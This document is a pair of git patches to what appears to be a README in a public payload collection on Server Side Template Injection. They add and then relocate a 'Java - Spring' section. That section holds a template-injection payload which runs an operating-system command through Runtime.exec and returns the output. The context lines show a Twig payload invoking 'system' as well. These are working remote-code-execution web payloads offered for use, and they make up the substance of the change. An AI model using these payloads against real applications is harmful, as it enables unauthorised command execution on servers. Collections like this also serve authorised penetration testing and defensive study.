From b672771a1b2fdb6bad78a80ac59057e072fe9b29 Mon Sep 17 00:00:00 2001 From: OddRabbit <52036269+oddrabbit@users.noreply.github.com> Date: Fri, 28 Oct 2022 00:07:26 +1100 Subject: [PATCH 1/2] Update README.md --- Server Side Template Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 656dc05..0b5208a 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -879,6 +879,15 @@ Execute code using SSTI for Slim engine. --- +## Spring Framework (Java) + +``` +*{7*7} +*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} +``` + +--- + ## Twig [Official website](https://twig.symfony.com/) From 996c83bb4ba054261767cf49f6c5b4d582393cf2 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 28 Dec 2022 10:54:48 +0100 Subject: [PATCH 2/2] Update README.md --- Server Side Template Injection/README.md | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 0b5208a..7b12f0e 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -72,7 +72,8 @@ - [Twig - Template format](#twig---template-format) - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading) - [Twig - Code execution](#twig---code-execution) - - [Java - Velocity](#velocity) + - [Java - Velocity](#java---velocity) + - [Java - Spring](#java---spring) - [PHP - patTemplate](#pattemplate) - [PHP - PHPlib](#phplib-and-html_template_phplib) - [PHP - Plates](#plates) @@ -879,15 +880,6 @@ Execute code using SSTI for Slim engine. --- -## Spring Framework (Java) - -``` -*{7*7} -*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} -``` - ---- - ## Twig [Official website](https://twig.symfony.com/) @@ -953,7 +945,7 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld --- -## Velocity +## Java - Velocity [Official website](https://velocity.apache.org/engine/1.7/user-guide.html) > Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code. @@ -971,6 +963,16 @@ $str.valueOf($chr.toChars($out.read())) --- + +## Java - Spring + +```python +*{7*7} +*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} +``` + +--- + ## patTemplate > [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts